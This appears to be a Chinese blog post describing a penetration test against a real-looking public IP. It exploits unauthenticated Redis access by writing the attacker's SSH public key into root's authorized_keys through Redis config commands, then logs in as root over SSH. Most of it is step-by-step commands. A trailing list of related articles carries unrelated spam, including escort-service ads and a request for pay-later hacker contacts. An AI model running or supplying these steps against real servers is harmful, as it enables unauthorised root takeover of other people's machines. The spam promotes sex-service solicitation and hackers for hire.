redis未授权访问配合ssh免密登录getshell

访客4年前黑客工具837

在一次渗透测试中拿到一个ip地址52.80.249.xx,nmap端口扫描出22,6379,80端口,目标机是linux系统的一台服务器,6379为redis的默认端口,尝试对其进行利用。使用kali作为攻击机

一、环境准备

1.1、在攻击机上面下载redis

wget http://download.redis.io/releases/redis-2.8.17.tar.gz

1614738932_603ef5f4db7e9c76a2947.png!small

1.2解压文件,执行文件

解压文件:tar xzf redis-2.8.17.tar.gz

进入redis目录:cd redis-2.8.17

安装:make1614738958_603ef60e19d1d32a09efd.png!small

1.3、进入src目录,将redis-server和redis-cli拷贝到/usr/bin目录下(这样以后启动redis就不用进入安装目录了)

cd src

cp redis-server /usr/bin

cp redis-cli /usr/bin

1614739063_603ef6772006fbef19778.png!small

1.4、、返回目录redis-2.8.17,将redis.conf拷贝到/etc/目录下

cd https://www.freebuf.com/articles/

cp redis.conf /etc/1614739077_603ef685548d1fa8bfa46.png!small

1.5、使用/etc/目录下的reids.conf文件中的配置启动redis服务:

redis-server /etc/redis.conf

1614739424_603ef7e08ff3f92e85f5b.png!small

1.6、然后ctrl+c退出,再次进入src目录然后连接目标靶机的redis服务

ctrl+c

cd src

redis-cli –h 52.80.249.xx

1614739756_603ef92c0434eaac3ef08.png!small

出现52.80.249.xx:6379>就代表连接成功,并且没有输入密码

二、漏洞利用

2.1、这里附上一个这里没法利用的一种 攻击方式截图(没有测试仅供参考)

1614739550_603ef85e32ce4bdb4d4b0.png!small

2.2、我们这里是不知道路径的,根据前期信息收集知道还有ssh服务的22端口是开放的,可以利用“公私钥”认证获取root权限

使用ssh生成公钥和私钥文件

ssh-keygen -t rsa

1614739600_603ef8909949dfe6413a6.png!small

2.3、进入.ssh文件下,将上面生成的公钥保存到1.txt里面

cd /root/.ssh

(echo -e " ";cat id_rsa.pub; echo -e " ") > 1.txt

1614739641_603ef8b92216f55ce53b7.png!small

2.4、将生成的公钥文件通过redis上传到目标服务器

cat 1.txt | redis-cli -h 52.80.249.xx -x set crack

1614739723_603ef90b19b25bf4db07b.png!small

2.5、远程连接redis服务

redis-cli -h 52.80.249.xx

1614739697_603ef8f135cb6f755ddce.png!small

2.6、获得redis备份的路径

config get dir 1614739787_603ef94bb8b73f6b2017f.png!small

2.7、更改redis备份路径为ssh公钥存放目录(一般默认为/root/.ssh):

1614739813_603ef9651e5cd9bcb38f1.png!small

2.8、设置上传公钥的备份文件名字为authorized_keys:

config set dbfilename authorized_keys

1614739828_603ef974e47752fad8eee.png!small

2.9、检查是否更改成功(查看有没有authorized_keys文件),没有问题就保存然后退出,至此成功写入ssh公钥到靶机

config get dbfilename

1614739853_603ef98dccee19aa1fbfa.png!small

2.10、攻击机直接ssh连接目标服务器

ssh -i id_rsa root@52.80.249.xx

1614739915_603ef9cb86ad2042651b1.png!small

相关文章

南宁市商务-【沈睿婕】

“南宁市商务-【沈睿婕】” 如果您还有其他问题,欢迎添加联系方式,在线预约咨询对于外围模特或者是商务平台上门的话,小编认为很多的商务,他们会根据自己的一些工作经验,让更多的人了解到他们越来越多的模...

乔晨粗粮坊加盟加盟条件是什么?

乔晨粗粮坊加盟加盟条件是什么?

  粗粮是对身体十分有利的一种食品。而且当下的消费群体都很注重养生和身体的健康。所以想创业的投资商可以从这里找到致富商机。乔晨粗粮坊加盟投资前景怎样?加盟一家有特色又美味而且营养健康的粗粮店铺是不错的...

百度新首页升级 '需求簇'引领互联网新趋势

近日,百度新首页开展了最新版本的升級检测,一部分客户早已能够首先使用。据了解,最新版本在本来出示“我的网站地址、热门新闻”等精彩纷呈服务项目的基本上,新增加了“要求簇”控制模块,现阶段包括“体育比...

西宁商务微信

用餐的情况下掌握来到西宁高端商女学妹,这儿的女学妹都十分的好看,而且有气质,而且他们都有各的性情,各有不同,御姐范跟萌妹子范这些都是有,许多老总找女学妹都很喜欢来西宁销售市场找女学妹,由于西宁的高端商...

4月4日清明节(4月4日清明节全国哀悼观后感)

4月4日全国都在哀悼在一线的为了他人,不惜牺牲的医生和护士,以及救火英雄们,是他们,才有今天的安全。为这些逆行者致敬,如果没有他们哪有我们现在的。 说明了对抗疫英雄的尊重和哀悼。 我在看完以后心情十分...

是否有先办事后付款的黑客微信或qq

Crash (此栏估计是程序调试所用,慎用,有些死机只能下电池了) *#9998*9266# 显示收信通道号及收信强度; *#9998*786# 显示的内容为本次开机的时间以及本次开机后到当前的时间长...